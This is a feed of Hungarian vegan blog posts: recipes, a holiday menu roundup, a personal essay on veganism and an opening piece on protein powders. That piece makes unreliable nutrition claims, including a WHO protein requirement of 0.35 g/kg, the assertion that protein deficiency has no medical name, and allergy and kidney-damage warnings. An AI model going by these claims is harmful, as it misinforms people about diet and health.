A fehérjeporok nagy százaléka tejből készül. Ami azért problémás, mivel sok ember érzékeny a tejben lévő, úgynevezett tejcukorra, a laktózra. Sőt, a tejben van egy kazein nevű fehérje, mely egy lassú felszívódású lánc és mely bezavarja gyorsfelszívódású fehérjék hasznosulását. A testépítők többek között a kazein miatt isszák inkább vízzel a fehérjeporokat, nem pedig tejjel. Visszatérve, a tejből készült fehérjeporok ugyan kis mennyiségben, de ugyanúgy tartalmaznak laktózt. Ezzel a kisebb mennyiséggel játszva megbirkózik a szervezet, de hosszútávon olyan néma allergiás mellékhatásai lehetnek, mint pl.: porallergia, illetve agresszív laktóz vagy akár tejérzékenység. Ilyen hosszútávú mellékhatással egy vegán fehérjepor sem rendelkezik. Emellett a tehenekbe pumpált növekedési hormonok, valamint a gyógyszerek és antibiotikumok bomlási termékei is nagy mértékben kerülnek be a tej és tejkészítményeken keresztül.
A vegán fehérjepor rosszabb felszívódást produkál?
Régebben sok helyről hallottam, hogy a növényi alapú fehérjeporok sokkal rosszabb felszívódást produkálnak mint az állati eredetű fehérjeporok. 2013-ban készült egy tanulmány mely konkrétan a teljes rizsszemből készült proteinpor kontra tejsavó proteinpor felszívódásának eredményességét vizsgáló kutatás eredményeit mutatja be. A kísérletek bebizonyították, hogy nincs mérvadó különbség a különböző eredetű fehérjeporok felszívódásának tekintetében. A vizsgálat kifejezetten teljes szemből készült rizs proteinnel zajlott, így a szója, lenmag, chia mag és egyéb növényi alapú vegán fehérjeporok felszívódási hatékonyságát még nem tudjuk biztosan.
Miért nem javaslom a fehérjeporok szedését?
Egyszerűen fogalmazva nincs rá szükség. A felnőtt ember fehérjeigénye nagyon alacsony, és ez az igény a testépítőknél sem nő drasztikusan. Ami veszélyessé teszi a fehérjefogyasztást az az a tény, hogy túlzott fehérjefogyasztás terheli a veséket többek között. Ez alól nem kivétel a vegán fehérjepor sem, az is fehérje, és ha túlléped a maximális szintet, bizony az is terheli a vesédet. A WHO hivatalos publikációban közölte ezeket a számokat: egy felnőtt ember protein szükséglete 0,35g testsúly kilogrammonként; súlyzós edzés mellett ez mindösszesen 1,35g-ra növekszik testsúly kilogrammonként. Ezen számok az elhízott embereknél nem relevánsak. További, konkrétan a fehérjeigénnyel és az ételek fehérjetartalmával foglalkozó cikket hamarosan publikálok.
Tisztán növényi alapú étrenddel bevihető az a fehérje mennyiség és minőség melyre a szervezetnek szüksége van. Emellett, hogy mennyire garantált a dobozon feltüntetett beltartalom és aminosav profil, azt is gyártója válogatja. Vannak egészen szép eredményeket hozó, és az ellenőrzéseken csúnyán elbukó gyártók egyaránt. Ebben a témában számos, főleg angol nyelvű tesztet lehet olvasni.
Legvégül pedig engedj meg egy kérdést: Hallottál már valaha krónikus fehérjehiányról mint betegségről? Na és fehérjemérgezésről? A fehérjehiányra mint olyanra nincs orvosi terminológia. Az éhező országokban komplett tápanyag és fehérjehiány van, de az más. Mi nem éhezünk. A fehérjemérgezés azonban ismert és előszele lehet a vesekárosodásnak. Miért fontos tudni ezt? Mivel az emberi minimum fehérjeigény és a túlzott fehérjebevitel szintje között bizony nagyon vékony a határ és könnyen túlzásba lehet esni még növényi étrenddel is. Főleg, ha vegán fehérjepor is szerepel a napi étrendben.
Sült paprikás karfiolkrémleves (gluténmentes, laktózmentes, tojásmentes, vegán)
sült paprikás karfiolkrémleves (mindenmentes, vegán) Nem tudom ti, hogy vagytok vele, de én előző életemben valószínűleg medve voltam. A hideg idő, a tél, a napsütés hiánya engem személy szerint mindig passzív üzemmódba kapcsol. A nagy karácsonyi hajrá után általában kicsit leengedek, elkezdődik a téli pihenés, majd folytatódik a szilveszterrel, és valamikor január végén - jó esetben - magamhoz is térek újra. Ilyenkor nem csak az alkotói kedvem alussza téli álmát, de a természet is pihen. Kevesebb a szép, színes természetes alapanyag, gyakrabban nyílik a fagyasztószekrény fiókja, és a fahéj meg a szerecsendió is a fűszeres polc elejére kerül. Kevésbé van kedvem nagy sütés-főzéseket, vendégségeket szervezni, és életmódváltó gondolataim is alább hagynak. A jövőmet meghatározó új és korszakmegváltó ötletek sem ebben az időszakban születnek! ;-) A nagy tervek és projektek, melyek még novemberben a mindennapjaim fontos részei voltak, most egy kicsit kevésbé fontosak. Semmi sem sürgős, semmi sem rohan. Én sem... Most inkább egyre több időt töltök a meleg takaró alatt, egy jó film vagy egy jó könyv társaságában. Valahogy minden csendesebb, békésebb... valahogy minden pihen. Én is, és a Zöld Avocado gasztroblog is. Ezt a téli pihenést, békés csendességet, gyakran kíséri egy - egy tál meleg krémleves. Gyorsan elkészíthetőek, átmelegítenek tetőtől talpig, táplálnak, és pótolják a kevesebb gyümölcs - zöldség fogyasztás által bevitt folyadékmennyiséget. Ráadásul a fűtésszezonnak köszönhetően gyakrabban érezzük a szomjúságot, a szájszárazságot. Már csak ezért is jól esik egy egyszerű, meleg krémleves, mint például a zöld spárgakrémleves, a mandarinos sárgarépakrémleves, a zellerkrémleves póréhagymával, vagy a brokkolikrémleves a Zöld Avocado ízei alapján. zöld spárgakrémleveszellerkrémleves póréhagymával Az ünnepeket az idén vidéken töltöttük... Mielőtt elutazunk valahová, mindig igyekszem felhasználni a maradék zöldségeket a hűtőből, amik már nem érnék meg a visszaérkezésünk napját. Ilyenkor születnek az új ételek, melyeket egyébként lehet, hogy soha nem készítenék el. Egy ilyen "hűtő kiürítő", utazás előtti napon sikerült szembe találnom magam egy fél karfiollal, és pár szem paprikával, melyek láttak már szebb napokat is. Karfiol és paprika? Hát ez nem éppen egy bomba párosítás. Nem sok étel jut eszembe, melyekben jól összeillenének. ;-) Ha nem jön az ihlet saját kútfőből, akkor legjobb barátunkat - guglit - hívom segítségül. Egy kis Internetes böngészés után rábukkantam egy krémlevesre, ami még elég ígéretesnek is hangzott. Rövid gondolkozás után, nekiláttam, és egy meglepően finom, és igazán rendhagyó, rettentően laktató krémleves született belőle. A sült paprika ízek kedvelőinek érdemes kipróbálni, mert egy szürke, hideg téli napon, kellemes melegséghez és telt pocakhoz juthatunk pár forintért, mindenféle különleges hozzávaló nélkül. Íme, hát a sült paprikás karfiolkrémleves ez alapján a recept alapján. sült paprikás karfiolkrémleves (mindenmentes, vegán) HOZZÁVALóK (4 személyre) - 1/2 fej közepes méretű karfiol - 3 db színes kaliforniai paprika (használhatunk más fajta paprikát is) - 1 db közepes méretű vöröshagyma - 3 gerezd fokhagyma - 2-3 ek olívaolaj - Himalája só, fekete őrölt bors, 1 tk mustár, csipet őrölt szerecsendió, 1 db bio zöldség (leves) kocka - 1 marék friss petrezselyem - 1 l tiszta víz - tálaláshoz: tökmag (elhagyható) sült paprika és sült karfiolELKÉSZÍTÉS A karfiolt megtisztítjuk, és alapos mosás után ujjnyi ,,szeletekre vágjuk a rózsákat. A paprikát megmossuk, kimagozzuk, és négy felé vágjuk. Egy sütőpapíron kiterítjük a paprikákat, és a karfiolt, majd 200 °C fokra előmelegített sütőbe tesszük. 5 perc múlva megfordítjuk a karfiolokat, majd tovább sütjük még 10 percet. Miután megsültek a zöldségek, kivesszük a sütőből, és hagyjuk kihűlni. A kihűlt paprikának lehúzzuk a héját. Közben az olívaolajon megdinszteljük az apróra vágott vöröshagymát, és fokhagymát. Hozzáadjuk a hagymakeverékhez, az elősütött zöldségeket, felöntjük 1 liter tiszta vízzel, fűszerezzük, és fedő alatt kb. 20 percig főzzük, míg puha nem lesz a karfiol. Miután megpuhult a karfiol, levesszük a tűzről, és botmixerrel krémesre turmixoljuk a levest. Apróra vágott friss petrezselyemmel elkeverjük a kész krémlevest, és enyhén sózzuk - borsozzuk, ha szükséges. Tökmaggal tálalhatjuk, a látványban ne m túl különleges, de ízben annál izgalmasabb meleg krémlevest. sült paprikás karfiolkrémleves (mindenmentes, vegán) Kellemes téli pihenést, és elcsendesedést kívánok! :-) Megjegyzés1: Azért érdemes elősütni a zöldségeket, mert teljesen más íz világa van a sült zöldségeknek, mint a szimplán csak főtt zöldségeknek. Próbáljátok ki, és teszteljétek le a sült zöldségek különleges aromáját! Megjegyzés2: A puffadásra érzékeny olvasók, inkább a korábban publikált krémleveseket próbálják ki. A karfiol és paprika páros csak erős gyomrúaknak ajánlott! sült paprikás karfiolkrémleves (mindenmentes, vegán)
Ne sajnáljon senki, hogy vegán vagyok!
2016. január 4. Eszemiszom – Jóga Magazin
A múltkor találkoztam egy cikkel az inteneten, amin nagyon felhúztem magam. A cikk valami táplálékallergia magazin oldalán jelent meg Sírjunk vagy nevessünk? Képeken a táplálékallergiások kemény élete címmel, és 25 elcsépelt indokot sorolt fel, ami szerint aki nem ehet valamit, mert tej/tojás/glutén akármi allergiája van, vagy cukorbeteg, annak innentől kezdve egy szenvedés az élete.
Jó, tudom, én azért más helyzetben vagyok, mert én saját választásomból lettem vegán. Igazából nem is szeretem így mondani, hogy vegán vagyok, mert egyrészt én nem vagyok olyan kocka-vegán, tehát alapvetően nem eszek állati eredetű dolgokat, de ha mondjuk anyu a mákossütit tejszínnel csinálta, akkor azért évente háromszor eszem belőle. Másrészt pedig ezt a vegánságot már néha úgy emlegetik, mintha aki vegán, az felsőbbrendű lenne, és ezt én nem szeretem. Én soha nem is próbálok meggyőzni senkit, hogy így, vagy úgy táplálkozzon, tőlem mindenki azt eszik amit akar. Én nem eszem állati eredetű dolgokat, és kész.
Viszont van olyan, akinek tényleg egyik napról a másikra kell lemondania a tejtermeékekről, vagy a lisztes dolgokról, mert mondjuk megtudja, hogy allergiás. Ilyen esetben ez biztos jóval nehezebb, már csak azért is, mert mind a fehér liszt, mind a tejtermékek függőséget okoznak. Az ember megszokott valamit, ragaszkodik hozzá, változtatni kell, és a legtöbben nehezen viselik a változásokat. De azért az korántsem igaz, hogy mostantól egy szenvedés lesz az élet, amit ez a cikk sugall!
Egyrészt, mert szinte a legtöbb ételt el lehet készíteni vegán verzióban (szerintem) nagyon finoman. Én például imádom a vegán töltött káposztát! És nem, nem azért eszem, mert annyira hiányzik a húsos töltött káposzta, mert azt kb sose ettem, nem is szerettem. Hanem azért, mert a vegán olyan finom! Csicserikolbásszal, rizstejföllel az egyik kedvencem. A káposzta vagy a lencsefasírttal ugyanígy vagyok. Nem azért csinálom, és eszem, mert majd megőrülök a rendes fasírozottért, mert azt sose nagyon szerettem. Hanem, mert ezek a vegán verziók finomak, táplálóak, és egészségesek is. De sorolhatnám még tovább példának a vegán tolhalkrémet (algából), vagy a vegán málnás túrótortát (kesukrémből).
Mástészt pedig rengeteg olyan étel van, ami nem tartalmaz állati eredetű dolgokat, emelett táplálóak, és finomak. Ha leragadtam volna a hagyomános konyha mellett, akkor biztos, hogy nem főznék ilyen változatosan. Nem készítenék például dhalt (indiai egytál étel mungóbabból vagy vöröslenycséből), falafelt, humuszt (sült padlizsánhoz nagyon finom, de néha a sütőtököt is azzal esszük), édesburgonyát, és a rengeteg nyers vegán édességet (én nem vagyok egy édesszájú, de a férjem kiköveteli ezeket is), köztük a banán alapú fagyi az egyik nagy kedvenc (és az egyik legegyszerűbb is).
Harmadrészt pedig a cikk azt is említi, hogy innentől kezdeve majd a gatyánk is rámegy, hogy az ilyen-olyan mentes élelmiszereket beszerezzük. Gondolom, az táplálékallergiásokra is lassan ráépül egy teljes iparág, mert egyre többen vannak, és naponta fogyasztanak... Csak szerintem pont az az egyik titka annak, hogy ha allergiásak vagyunk, meg egyébként is, hogy akkor járunk a legjobban, ha minél kevesebb feldolgozott élelmiszert veszünk. Persze, nem árt néhány konyhai gép, nekünk egy Vegital magtej készítő gépünk van, de ez nagyon hamar behozza az árát. (10 dkg magból, vagy gabonából készít 1 liter tejet, ami mondjuk zabpehely esetében 20 Ft / liter, egy drágább olajos mag esetében is megáll 300 Ft/lieternél, amíg egy bolti mag vagy gabonatej 600-800 Ft.) Emellett lehet még esetleg venni egy kenyérsütő gépet, de én elvagyok enélkül, paleokenyeret tudok sütni a sütőben is, és szeretem a puffasztott rizsszeletet.
Akár saját választásunk, hogy nem eszünk állati eredetű ételeket, akár az allergia kényszerít rá, biztosak lehetünk abban, hogy így sokkal egészségesebben és tudatosabban fogunk táplálkozni. Érdemes elolvasni a Dr. T. Colin Campbell Kína tanulmány c. könyvét erről.
És köszönöm szépen, én nagyon jól vagyok így, higgye el mindenki, hogy nekem az lenne a szenvedés, ha nem vegán (és gluténmentes) módon kellene táplálkoznom!
Tojásmentes mandulás muffin
2016. január 3. Élj harmóniában
Tojásmentes, mandulás muffinA muffinok gyorsan elkészíthetőek és megszámlálhatatlan édes és sós variációjuk van. Csak a készítő képzelete szabhat határt. Sokak számára a reggeli ételek vagy éppen a desszertek között éppen ezért gyakran kap helyet a muffin. Ez a férjem esetében is így van:) Ez egy jól bevált tojásmentes alaprecept, amit tudsz kedvedre variálni. Hozzávalók 12.5 dkg teljes kiőrlésű tönkölybúzaliszt 12.5 dkg fehér tönkölybúzaliszt 10-12 dkg barna nádcukor 5 dkg darált mandula 2 tk. citromlé vanília fél citrom reszelt héja 4 ek. olaj víz Keverd össze a száraz hozzávalókat egy tálba. Majd öntsd hozzá az olajat, citromlevet és annyi vizet, hogy nagyon sűrű palacsintatésztaszerű állagú legyen - kb 1,5 dl-2 dl víz). Gyorsan keverd össze és már gyorsan teheted is a 180 fokra előmelegített sütőbe. A muffin készítés egyik titka, hogy soha ne kevergesd hosszan a száraz összetevőket a nevesekkel és ne hagyd sokáig állni. Vegyszermentes (bio) alapanyagokat használj!
Újévi lencse olaszos hangulatban
2016. január 1. Vegasztrománia
Na nem a főzés körülményei, hangulata volt olaszos, hanem az ízvilág lett az. A lencse tavaly januárban indonéz curry formájában került az asztalra, de mivel sok minden megváltozott azóta, új energiákra, új ízekre vágytam. Bejött. Azzal a lendülettel, amelyikkel elengedtem a tavalyi évet, válogattam össze az egytálétel komponenseit. Lazán, de magabiztosan, szeretettel. Ahogy a 2016-os évet is megélem majd. Feltételezem, hogy ma már mindenki lencsézett, sebaj, a recept más napokon és jövőre is megállja a helyét! ;)
Lencse olaszos hangulatban
Hozzávalók 6-8 adag (1 csésze = 250 ml)
1 csésze zöld lencse és 1 csésze puy lencse egy éjszakára beáztatva 2-3 ek olívaolaj 2 lila hagyma kockákra vágva 3-4 gerezd fokhagyma apróra vágva 1 sárga kaliforniai paprika 1 közepes édesburgonya meghámozva, kockákra vágva 1 cukkini kockákra vágva 700 ml paradicsom passata 100 ml száraz fehér bor (opcionális) oregánó 2 csokor petrezselyem apróra vágva só frissen őrölt bors (fűszerekben lehet még menőzni, nekem ez most pont jó volt így) Az olívaolajon kb 5 percig sütöttem a lila hagymát és a fokhagymát, majd hozzáadtam a paprikát és 2 percig sütöttem. Hozzáadtam az édesburgonyát, átforgattam, majd felöntöttem egy kevés vízzel. Sóztam, borsoztam, és fedő alatt 10 percig pároltam. Közben a lencséket 5 perc alatt megfőztem sós vízben. Leszűrtem, félretettem. A zöldséges keverékhez hozzáadtam a cukkinit, a paradicsom passatát, és a bort (vagy egy kevés vizet), az oregánót, majd 6-7 percig főztem. A végén hozzákevertem a petrezselymet. (Zenei aláfestés: Tove Lo)
Sütőtökpite
Szerencsére idén rengetem finom, méz édes sütőtök nőtt a kertemben, amit imádok nyersen, sülve, de még főve is ;) Ma a nyers változat volt soron ;) Hozzávalók: Alap: 35-40 dkg áztatott dió (szárazon ennyi) 15 dkg áztatott szotyi 10 dkg áztatott tökmag 8-10 aszalt, megmosott füge 1 ek kókuszolaj 1 pici tiszta só 1 tk citromlé 1 […]
Vegetáriánus, vegán menü szilveszterre
2015. december 29. Zizi kalandjai
Ha még nem állítottátok össze a szilveszteri menüt, akkor remélem ez a kis összefoglaló nagy segítségetekre lesz, akár az idén, akár jövőre. Mint kisgyerekes család, nálunk egyszerű lesz a menü, sőt nem is menü lesz, hanem vacsora, közösen megesszük, hancúrozunk egyet Ádival, aztán aludni megy, mi pedig megnézünk egy-két filmet (amíg be nem alszunk valamelyiken ).
A receptek egy része a saját blogomról van, egy része pedig más blogokról lett összeválogatva, hogy minél színesebb körképet adjak a vegetáriánus, vegán szilveszterről.
Sós snackek, nasik
Amikor még több tejterméket ettünk, ez a sajtgolyó nagy sikert aratott a buliban, ahova vittük. Sajtkrém fűszerekkel, hagymával összedolgozva, golyóvá formázva és így tálalva. Crackerrel, sós kekszekkel tudunk tunkolni belőle.
A sós kekszek, sütik többsége nagyon könnyen vegánosítható (amelyik nem vegán persze)… ami mindig óriási sikert arat és tényleg nem lehet abbahagyni az az abbahagyhatatlan szezámos-mákos rúd. Szintén nagyon eteti magát a bazsalikomos-diós-juhsajtos keksz, a citromos-rozmaringos keksz vagy a sajtos keksz mákos széllel.
A mennyei túrós pogácsáról ne is beszéljünk, aki nekiáll, az nem tud szabadulni mellőle, a vegán (édes)burgonyás pogácsa pedig könnyed, légies majszolnivaló.
Puha sült perecek mustáros mártogatóssal…
Egyben sültek
Ahogy a karácsonyi asztalon jól mutatnak, úgy szerintem egy szilveszteri asztalról sem hiányozhat egy finom egyben sült, szeletekre vágva tálaljuk, amit aztán mindenki kiegészít valamilyen finom salátával.
Nálunk a legnagyobb sikere a diósültnek szokott lenni. Ez az a fajta étel, amiről nem hiszik el a húsevők sem, hogy nincsen benne hús!
A mázas diós lencsesült szintén egy tápláló, kiadós fogás, finom édeskéz mázzal megsütve a tetején.
A Jamie Oliver féle vörösáfonyás pisztácia mandula sült sok-sok alapanyagot tartalmaz, de ettől lesz fantasztikusan finom és karakteres íze. Szintén fantasztikus ez a Jamie féle egyben sült fűszeres paradicsommártásban elkészítve.
Ez a vörösáfonyás, narancsos lencsés quinoa egyben sült is jól néz ki.
Az egészben sütött karfiol nagyon nagy sláger az utóbbi időben. Hihetetlenül mutatós, ha egy ilyet teszünk ki az asztalra… egyszerre fogja az összes vendég rávetni magát és biztos vagyok benne, hogy gyorsan elfogy. Itt egy Jamie féle verzió (fokhagymásan, füstölt paprikásan, paradicsomosan), itt pedig egy Sarah Britton féle verzió, aki az indiai ízvilágot veti be a karfiol fűszerezésénél és menta chutney-val tálalja.
A nagy klasszikust, a kocsonyát is ebbe a csoportba teszem… tavaly készítettem el szilveszterre a vegán változatot.
Falatkák
Ez angolul a finger food, vagyis, amit gyorsan felkap a tálcáról az ember és már hamm be is kapta. Ezek a babos-zsályás falatok (bagetten tálalva) villámgyorsan elkészülnek.
Tofu “tojás” saláta kenyér falatokra kenve szintén nagyon finom lehet! Ezt biztosan ki fogom próbálni az új évben!
Vegán “tonhal” krém kenyérre, bagettre kenve… nyamm! És mi kerül bele? Dió, csicseriborsó, zeller, citromlé, stb… ez is biztosan gyorsan el fog fogyni!
Pankomorzsában kirántott zöldbabok… mutatósak, zöldek, ropogósak, gyorsan fogynak egy pohár pezsgő mellett!
Ezek az édesburgonyás, gránátalmás falatok bagetten tálalva elég mutatósak!
Fűszeres gombás falatkák, sütőtökös zsályás gesztenyés tekercsek Jamie-től, valamint szuperek ezek a nagyon mutatós sült mini Hasselback burgonyák.
Ha az ázsiai ízeket szeretnénk egy kicsit visszaadni, akkor megtehetjük tekercsekkel: íme a tavaszi és a téliesített változat citrusos szójaszósszal tálalva.
Kencék, mártogatósok
Tzatziki, ahogy a görögök csinálják…
Vegán spenótos kence, leveleskel articsókás kence crackerrel, kenyér falattal mártogatós…
Klasszikus humusz vagy avokádó “majonéz vagy sült kápia paprikás diós kence zöldségek mártogatásához.
Mexikói babos chilis mártogatós tortilla chips-szel.
Italok
Jamie-nél elég jó az ünnepi koktél választéka… van miből válogatni bőven. Tetszik ez a mentás gránátalmás spitzer vagy ez az almás fűszeres koktél.
Ha pedig valami édessel, krémessel, nagyon csokissal zárnánk az évet, ne feledkezzünk meg a forró csokoládéról. Íme egy jó kis gyűjtemény szuper receptekből.
Citromos kenyér teljes kiörlésű liszttel
2015. december 27. Élj harmóniában
Citromos kenyérEz egy könnyen elkészíthető sütemény és akik szeretik a citromos ízvilágot, nekik igazi élvezetet okoz. Aki jobban szereti az édeset készítheti 1 citrommal és több cukorral (15 dkg-val). Hozzávalók 250g liszt (felesbe teljes kiőrlésű és finomliszt) 10 dkg datolyacukor (vagy teljes értékű nádcukor) 4 dkg darált mandula 2 kisebb citrom leve és lereszelt héja 2 tk. sütőpor 1 tk. szódabikarbóna 1,2 dl (fél csésze) repceolaj (semleges bármilyen olajjal helyettesítheted) vanília 1,5- 2 dl víz Keverd össze a tészta hozzávalóit egy tálba gyorsan. A vizet apránként öntsd a tésztához, mert lisztfüggő mennyit vesz fel vigyázz ne legyen túl folyós a tészta. Majd egy kivajazott lisztezett hosszú kenyérformába öntsd bele. Tedd 180 fokra előmelegített sütőbe és süsd készre (kb 40 perc). Ha átsült vedd ki a sütőből. Ha szeretnéd hangulatosra, akkor a tetejét szórd meg melegen porcukorral. Vagy ha valami extra látványosat szeretnél, akkor a tetejére tehetsz cukormázat. A cukormáz készítése nagyon egyszerű - amikor kihűlt a sütemény, 100g porcukrot keverj össze 1 citrom levével és kend a mázat a sütemény tetejére és hagyd megszilárdulni. Vegyszermentes (bio) alapanyagokat használj!
Zserbó golyó
A szokásos karácsonyi nyers zserbót készítettem ma, és maradt ki töltelék, amihez már nem volt gyümölcslap. Gondoltam egyet, golyókat formáztam belőle, és leöntöttem friss, nyers csokival ;) Hozzávalók: 1 csészényi áztatott dió 1/2 csészényi áztatott napraforgó mag 2 édes alma (elhagyható, de így nem lesz annyira tömény) 1 kk fahéj 7-8 db aszalt füge 1 ek […]
Karácsonyi menü ajánló
Összeállítottam egy kis ajánlót, amit a blogon található receptekből válogattam össze. Pár ötlet, hogy mi kerüljön az ünnepi asztalra. :) A főételt valamilyen gabonával(pl.: bulgur, barna rizs, qinoa) gazdagíthatjuk még, hogy mindenki jóllakjon. Remélem találtok köztük kedvetekre valót! Leves: burgonyás csicsóka krémleves fokhagymás pirítóssal Főétel: babonézes édesburgonya saláta /almás füstölt tofu korianderes répapogácsa sárgaborsó fasírt vöröshagyma csírával répás tofukrokett vegán sushi Desszert/kínálók: töltött sült alma vegán sajttorta karobos amaránt golyók "mézes"kalács szaloncukor Mindenkinek kellemes ünnepeket, boldog karácsonyt kívánok!
Vegán brokkolis rakott palacsinta
2015. december 19. Vegán lettem
Vegán brokkolis rakott palacsinta a karácsonyi céges vacsira? Hát persze. Nálunk mindenki készít valami finomságot és azzal lepjük meg a többieket. Én egy ilyet követtem el.
A céges karácsonyi vacsorára a már jól bevált édes vegán rakott palacsinta dukált részeméről, de megelőztek a többiek édesség terén, így ki kellett valami mást találnom. Valami főételt. A palacsintát nem akartam elvetni, így valami rakott dologban gondolkodtam, azt nem lehet elrontani alapon. A gombás tölteléket jelen esetben elvetetettem és letettem a voksomat a brokkolira. Így készült el a vegán brokkolis rakott palacsinta.
Vegán brokkolis rakott palacsinta hozzávalók
Tészta:
400g graham búzaliszt (graham liszt helyett bármilyen lisztet használhatsz, én azért választottam ezt, mert ez volt itthon)
7dl ásványvíz
10g kókuszzsír
negyed póréhagyma (medvehagymával is nagyon finom lesz)
só
Töltelék és öntet:
1kg brokkoli (kb. két fej)
7dl vegán tejföl
2db közepes méretű chili madárszem (bármilyen más chili is megteszi)
pirospaprika
bors
só
petrezselyem
oregánó
Vegán brokkolis rakott palacsinta elkészítése
Add hozzá a graham búzaliszthez a 1,5l ásványvizet apránként és keverd el csomómentesre a tésztát. Nem lesz nehéz dolgod ezzel, mivel a graham liszt eléggé szemcsés liszt. Miután ez megtörtént vágd fel hosszúkás szálakra a póréhagymát és keverd a tésztához, majd adj hozzá annyi sót a nyers alapanyaghoz amennyit indokoltnak érzel. Ezután süsd ki a palacsintákat.
Miután készen vagy a palacsintákkal készítsd el a tölteléket és az öntetet. Vágd le a brokkolik zöldjét a torzsáról és vágd egészen apró darabokra. A torzsát is vágd fel, de azt tedd egy turmixgépbe kevés vízzel és turmixold össze. Ezután öntsd össze a brokkoli zöldjét az összeturmixolt torzsájával egy serpenyőbe, tegyél rá sót, piros paprikát, borst, és a 2db közepes méretű chili madárszemet, majd tedd fel kis lángon párolódni. Miután megpuhult a brokkoli adj hozzá 6dl vegán tejfölt és hagyd rottyanni egyet.
A vegán brokkolis rakott palacsinta magas falú, kerek jénai tálba kell készüljön. A tál aljára tegyél be egy palacsintát, rá annyi tölteléket, hogy néhol kilátszódjon a palacsinta, majd megint egy palacsintát és jöhet rá megint a töltelék. Ezt folytasd addig, amíg meg nem telik a tál. Majd 1dl vegán tejfölt keverj össze petrezselyemmel és oregánóval, majd vékonyan kend meg a rakott palacsinta tetejét. Végül a vegán brokkolis rakott palacsinta süljön kb. 30 percig a 200°C-ra előmelegített sütőben. Hagyd kihűlni, majd tálald. Jó étvágyat!
A vegán brokkolis rakott palacsinta elkészítése kb. 2,5 óra.
Tejszínhab tej nélkül? Lehetséges!
2015. december 18. Gréta konyhája
Ha tej, azt mondom kókusztej, mandulatej, mogyorótej, rizstej, máktej...
Ha tejföl, joghurt, akkor azt mondom szójatejföl, szójajoghurt, kókuszjoghurt, magtejfölök...
A sajtokat is könnyedén elkészíthetjük otthon, vagy széles választékban megvásárolhatjuk bioboltokban, akár a Trappistát, Füstöltet, Cheddart, Mozzarellát, és most már Parmezánt is.
Ha tejszín, akkor szójatejszín, rizstejszín, mandulatejszín...
De a nagy kérdés, hogyan tudunk megszokott textúrájú, mégis egészséges, növényi, tejszín ízű habot készíteni a különböző sütikhez, krémeket.
Tapasztalatom azt mutatja, hogy először mindenki a nagyáruházakban kapható, és növényi tejszín jelzővel illetett termékekhez nyúl, amelyek cukrozatlan változata még jó is lenne számunkra, ha az összetevők címszó alatt, nem látnánk felsorolva a tejfehérjét, és nem pálmazsírból és hidrogénezett növényi zsírokból készülnének, amelyek egészség-és környezetkárosító hatásúak.
Így más alternatívák után kell nézni az arra allergiásoknak, és a vegánoknak is.
Elkezdtem kísérletezni a főzőtejszínekkel, de nem jártam sikerrel.
Egy külföldi blogon olvastam a kókusztejszínhabról, ami leírva nagyon egyszerűnek tűnt, és jóval olcsóbbnak, mint a fentebb említett alternatívák.
Vegyünk egy magas zsírtartalmú sűrű nagy kókusztartalommal rendelkező konzerv kókusztejet és egy éjszakra tegyük hűtőbe. Csak közvetlenül akkor vegyük ki a hűtőből, ha felverjük.
Egy tálba fölözzük le a sűrű krémes a doboz tetején ülő kókuszkrémet,. (a vízszerű maradékot a dobozban hagyjuk, és mondjuk a legközelebbi turmixunkba tudjuk tenni )
Hozzáadjuk a nádporcukrot, vagy stévia port(ízlés szerint) és gépi habverővel felverjük.
A másik verzió, ha habszifont használunk, ez esetben a sűrű kókusztejszín a legmegfelelőbb, amit pici kókusztejjel hígíthatunk, teszünk hozzá egy teáskanál útifűmaghéjat , elkeverjük, majd mehet a szifonba. Tehetünk bele stévia port, vanília aromát. Jól összerázzuk. Minden legyen hűtőhideg.!!!
Az ebből készült édességeket érdemes hűtőben tartani, mert előfordulhat, hogy szobahőmérsékleten elkezd olvadni, még mielőtt felszolgálnánk.
Fehér forró csokoládé másképp (vegán)
2015. december 17. Zizi kalandjai
Karácsony este… már semmi nem fér belénk, de mégis csak olyan rég volt az a vacsora és jól esne valami finomság, ami melegít, meg édes, meg különleges, de tudunk aludni is tőle (mert nincs benne koffein) bármennyire is késő van. Valami kortyolgatnivaló, amit a puha takaró alá bújva, éppen a karácsonyra kapott új könyvünket olvasva vagy valamelyik romantikus karácsonyi filmet nézve, még inkább ellazít bennünket és plusz örömforrást jelent az este lezárásaként.
Hát hoztam egy ilyen italt nektek… A recept különlegessége, hogy nem fehér csokiból készült, hanem kakaóvajból. Nem szeretem a fehér csokit, mert túl édes nekem (legalábbis, amiket eddig kóstoltam). Ez a forró csoki viszont nem túl édes, ugyanis mi magunk édesítjük, tehát saját ízlésünkhöz igazíthatjuk. Kis csészéből kortyolgatva igazi finomság, tehát ne hagyjátok ki!
A kakaóvajat én az Ázsia Bt-nél vettem, de reform- és bioboltokban is megtaláljátok vagy online áruházakban.
Fehér forró csokoládé másképp (vegán)
Hozzávalók 2 főre:
– 1 és 1/4 bögre kókusztej
– 1 bögre víz
– 50 g kakaóvaj
– 1-2 evőkanál juharszirup, ízlés szerint
– egy csipet só
– szerencsendió, tálaláshoz
(A recepthez használt bögre 250 ml-es.)
Tegyünk minden hozzávalót egy kis lábasba. Forraljuk fel a csoki keveréket, majd vegyük takarékra a lángot és melegítsük addig, amíg a kakaóvaj elolvad.
Öntsük turmixgépbe, majd turmixoljuk össze (egyben habosítjuk is) 3-4 perc alatt. Tálaljuk kis csészékbe öntve, reszeljünk rá szerecsendiót.
Tipp: először az állaga elég híg lesz, úgy tűnik majd, hogy túl sok vizet adtunk hozzá. Várjunk egy kicsit, mert be fog sűrűsödni. Ha nagyon kihűlne, akkor melegítsük újra.
Tepsiben sült téli zöldségek Zizi módra (vegán)
2015. december 15. Zizi kalandjai
Na, hát semmi extrát nem jelent a Zizi mód, de eddig bárkinek ajánlottam eme elkészítést, mindenki imádta. Finom, szaftos, sült zöldségek, amelyek magukban fogyasztva is kiválóak, de akár feta sajtot morzsolva a tetejére is ehetjük vagy tofu steak mellé köretnek tálalva. Ha a karácsonyi menü összeállításán gondolkodunk, akkor se feledkezzünk meg róla, mert kiváló lehet köretként feltálalva a sok finomság mellé.
És, hogy mik kerülnek bele? Nálam most ezek a zöldségek: sárgarépa, burgonya, lila burgonya, édesburgonya, brokkoli, lila hagyma és fokhagyma. De kamránk, hűtőszekrényünk és ízlésünk szerint variálhatjuk a zöldségeket… kiváló bele a sütőtök, paszternák, tarló répa, de akár a csicsóka vagy karfiol is.
